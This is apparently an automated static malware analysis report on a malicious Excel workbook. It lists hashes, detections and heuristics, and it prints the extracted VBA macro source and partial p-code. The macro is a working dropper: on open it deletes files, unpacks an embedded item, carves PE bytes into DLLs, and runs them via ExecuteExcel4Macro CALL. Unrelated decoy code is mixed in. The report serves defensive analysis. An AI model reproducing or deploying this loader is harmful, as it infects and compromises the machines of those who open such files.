Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4eea8fccc29df669…

MALICIOUS

Office (OLE)

Size: 795.0 KB
Created: 2020-06-22 10:41:03
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: 779a1231de8ddd8646f60fdc7505fbf2
SHA-1: fb3a0cd42ee09dc518c2fbd21d7c738ee0a399a8
SHA-256: 4eea8fccc29df6694bcf7693f23cc23550d533ac4e6fb0442ebe98561bcb3fc8
Risk Score: 590

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The sample is a malicious Excel document containing a Workbook_Open VBA macro. This macro triggers the execution of an embedded PE executable, identified as a dropper by ClamAV. The presence of Shell() calls and references to the LoadLibrary and GetProcAddress APIs indicates that the macro is designed to load and execute the embedded payload, likely downloading additional stages.

Heuristics 14

  • ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
             sendings = 1
             Dim sNMSP As New Shell
             FlagDouble = True
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName DestinationKat, "CopyHere", VbMethod, harvest.Items.Item(Lrigat)
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
    If WelcomeDialog.Visible = True Then
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46396 bytes
SHA-256: 636493c262dc2d468b008f1a91fbc04c93896e7befb6e2f54d4c87423f1cec6a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module2.WuzzyBud 3900
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Repositor"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property


Public Property Let Speed(sp As Integer)
  
End Property



Attribute VB_Name = "Module0"





Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    DoEvents
    ActiveWorkbook.Close
DoEvents
    DoEvents
    
        
End Sub





Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub







Public Sub DerTip()
    
   
   
   Dim ofbl As String
    Dim sOfbl As String
     Dim CurrentSizeOfAT As Long

 Dim sendings As Integer
    dershlep = "" + Dialog4.TextBox1.Tag
Dialog4.TextBox3.ControlTipText = Dialog4.TextBox3.Tag
 
ofbl = Dialog4.TextBox3.ControlTipText
ofbl = ofbl + "\libUltra"
ctackPup = Dialog4.TextBox1.Tag + "\mannua"
 ctackPup = ctackPup + "l.xlsx"
        ctackPop = dershlep & Dialog4.TextBox3.Value
        
         Dim arr(1 To 3) As String
    
   
    
ctackPip = ctackPup & Page11.Range("B115").Value
 
 PublicResumEraseByArrayList ofbl + "*", ctackPop, ctackPip
 
        
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
         sendings = 1
         Dim sNMSP As New Shell
         FlagDouble = True
              
         Lrigat = Dialog4.Label11.Tag
         
        If sendings > 0 And sendings > -30 Then
         
            Set DestinationKat = sNMSP.Namespace(dershlep)
            Set harvest = sNMSP.Namespace(ctackPip)
          
          
        End If


CallByName DestinationKat, "CopyHere", VbMethod, harvest.Items.Item(Lrigat)
   
   Dim car As Repositor
    
Set car = New Repositor
   For StepBit = 1 To 2
 
    CurrentSizeOfAT = 289280
      sendings = 1
            sendingsCSTR = "1"
        If FlagDouble Then
                CurrentSizeOfAT = 200000 + 92860 + 4
                sendings = 2
                FlagDouble = False
            sendingsCSTR = "2"
            End If
       
            
            sOfbl = ofbl + sendingsCSTR + ".dll"
 Composition dershlep + Dialog4.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings
       
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        If -100 <= sendings Then
            sendings = sendings + 1
            ChDir Dialog4.TextBox3.Tag
            sendings = sendings + 1
        End If
        sOfbl = """" + sOfbl & ""","""

        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        
        

        If sendings > 1000 Then
            sendings = sendings + 1
        End If

        If sendings < 0 Then
            sendings = sendings + 1
        End If

        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
   If HiddenEE4M(sOfbl) Then
       Exit Sub
       
    End If
    
   
Next
        
End Sub




Attribute VB_Name = "Module1"

 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " ccc" Then
                
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub






Attribute VB_Name = "Module2"
 Public DisputeChannel3 As Byte
     
Public DecemberUpdate As Byte
 
 

Public HurricanMoes() As Byte

     
    Public abbrev As Byte




Public Sub WuzzyBud(dImmer As Integer)

If WelcomeDialog.Visible = True Then
Exit Sub
End If

 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    
    Dim redoMochup As New WshShell
    
    
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select
    
Dim car As Repositor
    Dim SpecialPath As String
    

PRP = "%" & Dialog4.TextBox1.Tag

Dialog4.TextBox1.Tag = redoMochup.ExpandEnvironmentStrings(PRP + "%")

    
Set car = New Repositor
Dialog4.TextBox3.Tag = car.CheckCar(redoMochup, Dialog4.TextBox3.ControlTipText & "")
ChDir (Dialog4.TextBox1.Tag)
If WelcomeDialog.Visible = False Then
WelcomeDialog.Show
End If

End Sub





Attribute VB_Name = "Module4"




 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub






Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim ProstoPlan As Long
  Dim logicVari As Integer
 Dim SimpleMethod As Integer
 ReDim HurricanMoes(1 To fl)
 ProstoPlan = FreeFile
 Open Composition2 For Binary Access Read As ProstoPlan

 logicVari = 1
Do While 1
 Get ProstoPlan, , abbrev
 If abbrev = FirstB Then
 HurricanMoes(1) = abbrev
 Get ProstoPlan, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 HurricanMoes(2) = DisputeChannel3
 Get ProstoPlan, , DecemberUpdate
 If DecemberUpdate = ThirdB Then
 HurricanMoes(3) = DecemberUpdate
 If logicVari = DisputeChannel6 Then
 For k = 4 To fl
 Get ProstoPlan, , abbrev
 HurricanMoes(k) = abbrev
 Next k
 Exit Do
 Else
 logicVari = logicVari + 1
 End If
 End If
 End If
 End If
 Loop
 On Error Resume Next
 LoopIfEnd = 400
 Close ProstoPlan
 LoopIfEnd = 400 + LoopIfEnd
 ProstoPlan = FreeFile
 LoopIfEnd = 400 + LoopIfEnd
 Open ofbl For Binary Lock Read Write As #ProstoPlan
 LoopIfEnd = 400 + LoopIfEnd
 zeroBob = 1
 For i = zeroBob To UBound(HurricanMoes)
 
 If WelcomeDialog.Enabled = True Then

    Put #ProstoPlan, , HurricanMoes(i)
 End If
 Next i
 Close ProstoPlan
 ProstoPlan = FreeFile
 For HSP = 33 To -1 Step -0.25
 ProstoPlan = 6 + i
 Next HSP
End Sub




Private Sub cmd_Keluar_Click()
Unload LSD.Me
MDIForm1.dokter.Enabled = True
MDIForm1.dokter.Checked = False
End Sub

Private Sub cmd_Perbaiki_Click()
If cmd_Perbaiki.Caption = "Pe&rbaiki" Then
   cmd_Simpan.Enabled = False
   cmd_Hapus.Enabled = False
   cmd_Batal.Enabled = True
   Dim var As String
   var = InputBox("Ketikkan kode dokter yang datanya akan di perbaiki !", "Perbaiki Data dokter")
   If var = Empty Then Exit Sub
      Data1.Recordset.Index = "Kode_dokter"
      Data1.Recordset.Seek "=", var
      If Not Data1.Recordset.NoMatch Then
         Call tam.pil
         txtkd_dok.Enabled = False
         txtnm_dok.Enabled = True
         cmd_Perbaiki.Caption = "&Perbaharui data"
      Else
         MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"
      End If
Else
Data1.Recordset.Edit
Data1.Recordset!kode_dokter = txtkd_dok.Text
Data1.Recordset!nama_dokter = txtnm_dok.Text
Data1.Recordset.Update
Call ber.sih
cmd_Perbaiki.Caption = "Pe&rbaiki"
cmd_Batal.Enabled = False
cmd_Simpan.Enabled = True
cmd_Hapus.Enabled = True
Call tdk_bi.sa
End If
End Sub

Private Sub cmd_Simpan_Click()
If cmd_Simpan.Caption = "&Isi Data" Then
Call bis.a
nom.Or
M.e.txtnm_dok.SetFocus
cmd_Batal.Enabled = True
cmd_Perbaiki.Enabled = False
cmd_Hapus.Enabled = False
cmd_cari.Enabled = False
cmd_Simpan.Caption = "&Simpan Data"
Else
If txtkd_dok.Text = "" Or _
        txtnm_dok.Text = "" Then
        MsgBox "Data tidak boleh kosong !", vbCritical, "SISTEM PENJUALAN KREDIT"
        txtkd_dok.SetFocus
        Else
cmd_Batal.Enabled = False
cmd_Perbaiki.Enabled = True
cmd_Hapus.Enabled = True
cmd_cari.Enabled = True
Data1.Recordset.AddNew
Data1.Recordset!kode_dokter = txtkd_dok.Text
Data1.Recordset!nama_dokter = txtnm_dok.Text
Data1.Recordset.Update
Call ber.sih
cmd_Simpan.Caption = "&Isi Data"
End If
End If
End Sub



Attribute VB_Name = "Module5"


Public Function HiddenEE4M(sOfbl)
HiddenEE4M = False
varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "goldman"",""J"")")
 If IsNumeric(varRes1) Then
  If varRes1 = 0 Then
   HiddenEE4M = True
  End If
 End If
End Function




Private Sub Command7_Click()
 b = MsgBox("?????????", vbYesNo)
 If b = vbYes Then
  a = "delete from cinema where cinid='"
  a = a + Text1.Text + "'"
  cnmovie.Execute a
  rs4.Close
  Sql = "select * from cinema"
  rs4.Open Sql, cnmovie, adOpenDynamic, adLockOptimistic
     If rs.BOF And rs.EOF Then
       MsgBox "?????!"
     Else
       rs4.MoveFirst
     Call View.Data
   End If
 End If
End Sub
Private Sub nomor()
Dim urutan As String * 5
Dim hitung As Byte

    If Data1.Recordset.RecordCount = 0 Then
        urutan = "Dr" & "001"
    Else
        Data1.Recordset.MoveLast
        If Val(Left(Data1.Recordset!kode_dokter, 3)) <> "000" Then
            urutan = "00" & "001"
        Else
        hitung = Val(Right(Data1.Recordset!kode_dokter, 3)) + 1
        urutan = "Dr" & Right("000" & hitung, 3)
    End If
    End If
    M.e.txtkd_dok = urutan

End Sub

Private Sub cmd_Batal_Click()
Call be.rsih
Call td.k_bisa
cmd_Batal.Enabled = False
cmd_Perbaiki.Enabled = True
cmd_Hapus.Enabled = True
cmd_cari.Enabled = True
End Sub

Private Sub cmd_cari_Click()
Dim var As String
var = InputBox("Masukan Kode Dokter yang ingin anda cari!", "Cari data dokter")
If var = Empty Then Exit Sub
   If var <> "" Then
      Data1.Recordset.Index = "kode_dokter"
      Data1.Recordset.Seek "=", var
      If Not Data1.Recordset.NoMatch Then
         Call tam.pil
         Call bi.sa
         Call kun.ci
      Else
         MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"
      End If
   End If
End Sub

Private Sub cmd_Hapus_Click()
Dim var As String
var = InputBox("Masukan Kode dokter yang akan dihapus!", "Hapus dokter")
If var = Empty Then Exit Sub
   If var <> "" Then
      Data1.Recordset.Index = "Kode_dokter"
      Data1.Recordset.Seek "=", var
      If Not Data1.Recordset.NoMatch Then
         Data1.Recordset.Delete
         Data1.Refresh
         Data1.Recordset.MoveFirst
      Else
         MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"

      End If
    End If
End Sub


Attribute VB_Name = "Dialog4"
Attribute VB_Base = "0{C700E57F-9AAC-4BC0-9D57-055CA442DBD9}{3B9877C1-D161-4596-B086-1A549513FECB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{92A9393B-3F5E-470D-B46C-19191FCC4246}{C8B3DF52-2EFF-4BDF-A0C1-BAF16B946ADC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub





Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_hon1jbki
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1883 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	Ld WelcomeDialog 
' 	MemLd Visible 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #2:
' 	ExitSub 
' Line #3:
' 	EndIfBlock 
' Line #4:
' 	LitDI2 0x0F3C 
' 	Ld Module2 
' 	ArgsMemCall WuzzyBud 0x0001 
' Line #5:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 1639 bytes
' Line #0:
' 	FuncDefn (Private Sub Worksheet_SelectionChange(ByVal Target As ))
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Page11 - 1705 bytes
' _VBA_PROJECT_CUR/VBA/Repositor - 4406 bytes
' Line #0:
' Line #1:
' 	Dim 
' 	VarDefn vSpeed (As Integer)
' Line #2:
' 	Dim 
' 	VarDefn vLicensePlate (As String)
' Line #3:
' Line #4:
' 	FuncDefn (Public Property Get Speed(id_FFFE As Integer) As Integer)
' Line #5:
' 	Ld vSpeed 
' 	St Speed 
' Line #6:
' 	EndProp 
' Line #7:
' Line #8:
' Line #9:
' 	FuncDefn (Public Property Get CheckCar(car As Object, Drive As String, id_FFFE As Variant))
' Line #10:
' 	LitStr 0x0000 ""
' 	Ld Drive 
' 	Concat 
' 	Ld car 
' 	ArgsMemLd SpecialFolders 0x0001 
' 	St CheckCar 
' Line #11:
' Line #12:
' 	EndProp 
' Line #13:
' 	FuncDefn (Public Property Get SpecialFolders(id_FFFE As String) As String)
' Line #14:
' 	Ld vLicensePlate 
' 	St LicensePlate 
' Line #15:
' 	EndProp 
' Line #16:
' Line #17:
' 	FuncDefn (Public Property Let LicensePlate(lp As String))
' Line #18:
' 	Ld lp 
' 	FnLen 
' 	LitDI2 0x0006 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld xlErrValue 
' 	Paren 
' 	Ld Err 
' 	ArgsMemCall Raise 0x0001 
' 	EndIf 
' 	QuoteRem 0x0030 0x000B "Raise error"
' Line #19:
' 	Ld lp 
' 	St vLicensePlate 
' Line #20:
' 	EndProp 
' Line #21:
' Line #22:
' Line #23:
' 	FuncDefn (Public Property Let Speed(sp As Integer))
' Line #24:
' Line #25:
' 	EndProp 
' Line #26:
' Line #27:
' _VBA_PROJECT_CUR/VBA/Module0 - 8721 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' 	FuncDefn (Public Sub VistaQ(WhereToGo))
' Line #6:
' 	ArgsCall DoEvents 0x0000 
' Line #7:
' 	Ld ThisWorkbook 
' 	MemLd Sheets 
' 	ArgsMemCall Copy 0x0000 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #9:
' 	ArgsCall DoEvents 0x0000 
' Line #10:
' 	Ld WhereToGo 
' 	LitVarSpecial (False)
' 	ParamNamed Local 
' 	LitDI2 0x0003 
' 	LitDI2 0x0007 
' 	Mul 
' 	LitDI2 0x0003 
' 	LitDI2 0x0007 
' 	Mul 
' 	Add 
' 	LitDI2 0x0009 
' 	Add 
' 	ParamNamed FileFormat 
' 	Ld ActiveWorkbook 
' 	ArgsMemCall SaveAs 0x0003 
' Line #11:
' 	ArgsCall DoEvents 0x0000 
' Line #12:
' 	ArgsCall DoEvents 0x0000 
' Line #13:
' 	Ld ActiveWorkbook 
' 	ArgsMemCall Close 0x0000 
' Line #14:
' 	ArgsCall DoEvents 0x0000 
' Line #15:
' 	ArgsCall DoEvents 0x0000 
' Line #16:
' Line #17:
' Line #18:
' 	EndSub 
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' 	FuncDefn (Public Sub PublicResumEraseByArrayList(putArrayBigList As ))
' Line #25:
' 	OnError (Resume Next) 
' Line #26:
' 	StartForVariable 
' 	Ld Key 
' 	EndForVariable 
' 	Ld putArrayBigList 
' 	ForEach 
' Line #27:
' 	Ld Key 
' 	ArgsCall Kill 0x0001 
' Line #28:
' 	StartForVariable 
' 	Ld Key 
' 	EndForVariable 
' 	NextVar 
' Line #29:
' 	OnError (GoTo 0) 
' Line #30:
' 	EndSub 
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' 	FuncDefn (Public Sub DerTip())
' Line #39:
' Line #40:
' Line #41:
' Line #42:
' 	Dim 
' 	VarDefn ofbl (As String)
' Line #43:
' 	Dim 
' 	VarDefn sOfbl (As String)
' Line #44:
' 	Dim 
' 	VarDefn CurrentSizeOfAT (As Long)
' Line #45:
' Line #46:
' 	Dim 
' 	VarDefn sendings (As Integer)
' Line #47:
' 	LitStr 0x0000 ""
' 	Ld Dialog4 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	Add 
' 	St dershlep 
' Line #48:
' 	Ld Dialog4 
' 	MemLd TextBox3 
' 	MemLd Tag 
' 	Ld Dialog4 
' 	MemLd TextBox3 
' 	MemSt ControlTipText 
' Line #49:
' Line #50:
' 	Ld Dialog4 
' 	MemLd TextBox3 
' 	MemLd ControlTipText 
' 	St ofbl 
' Line #51:
' 	Ld ofbl 
' 	LitStr 0x0009 "\libUltra"
' 	Add 
' 	St ofbl 
' Line #52:
' 	Ld Dialog4 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	LitStr 0x0007 "\mannua"
' 	Add 
' 	St ctackPup 
' Line #53:
' 	Ld ctackPup 
' 	LitStr 0x0006 "l.xlsx"
' 	Add 
' 	St ctackPup 
' Line #54:
' 	Ld dershlep 
' 	Ld Dialog4 
' 	MemLd TextBox3 
' 	MemLd Value 
' 	Concat 
' 	St ctackPop 
' Line #55:
' Line #56:
' 	Dim 
' 	LitDI2 0x0001 
' 	LitDI2 0x0003 
' 	VarDefn arr (As String)
' Line #57:
' Line #58:
' Line #59:
' Line #60:
' 	Ld ctackPup 
' 	LitStr 0x0004 "B115"
' 	Ld Page11 
' 	ArgsMemLd Range 0x0001 
' 	MemLd Value 
' 	Concat 
' 	St ctackPip 
' Line #61:
' Line #62:
' 	Ld ofbl 
' 	LitStr 0x0001 "*"
' 	Add 
' 	Ld ctackPop 
' 	Ld ctackPip 
' 	ArgsCall PublicResumEraseByArrayList 0x0003 
' Line #63:
' Line #64:
' Line #65:
' 	Ld ctackPup 
' 	ArgsCall VistaQ 0x0001 
' Line #66:
' Line #67:
' 	Ld ctackPup 
' 	Ld ctackPip 
' 	ArgsCall FileCopy 0x0002 
' Line #68:
' 	LitDI2 0x0001 
' 	St sendings 
' Line #69:
' 	Dim 
' 	VarDefn sNMSP (New As Shell)
' Line #70:
' 	LitVarSpecial (True)
' 	St FlagDouble 
' Line #71:
' Line #72:
' 	Ld Dialog4 
' 	MemLd Label11 
' 	MemLd Tag 
' 	St Lrigat 
' Line #73:
' Line #74:
' 	Ld sendings 
' 	LitDI2 0x0000 
' 	Gt 
' 	Ld sendings 
' 	LitDI2 0x001E 
' 	UMi 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #75:
' Line #76:
' 	SetStmt 
' 	Ld dershlep 
' 	Ld sNMSP 
' 	ArgsMemLd Namespace 0x0001 
' 	Set DestinationKat 
' Line #77:
' 	SetStmt 
' 	Ld ctackPip 
' 	Ld sNMSP 
' 	ArgsMemLd Namespace 0x0001 
' 	Set harvest 
' Line #78:
' Line #79:
' Line #80:
' 	EndIfBlock 
' Line #81:
' Line #82:
' Line #83:
' 	Ld DestinationKat 
' 	LitStr 0x0008 "CopyHere"
' 	Ld VbMethod 
' 	Ld Lrigat 
' 	Ld harvest 
' 	MemLd Items 
' 	ArgsMemLd Item 0x0001 
' 	ArgsCall CallByName 0x0004 
' Line #84:
' Line #85:
' 	Dim 
' 	VarDefn car (As Repositor)
' Line #86:
' Line #87:
' 	SetStmt 
' 	New id_FFFF
' 	Set car 
' Line #88:
' 	StartForVariable 
' 	Ld StepBit 
' 	EndForVariable 
' 	LitDI2 0x0001 
…
embedded_office_00001b61.exe embedded-pe Office MZ+PE at offset 0x1B61 807071 bytes
SHA-256: c1839d84105a95668945680ecd6c1858306d7c2a6f3309b2aaeaacfddcc4b1da
Detection
ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: MBD01077535/Ole10Native 586697 bytes
SHA-256: 96da46e1b9dc6604d24792dd7853901ee44ecbe8286f742a2483090f0688ee90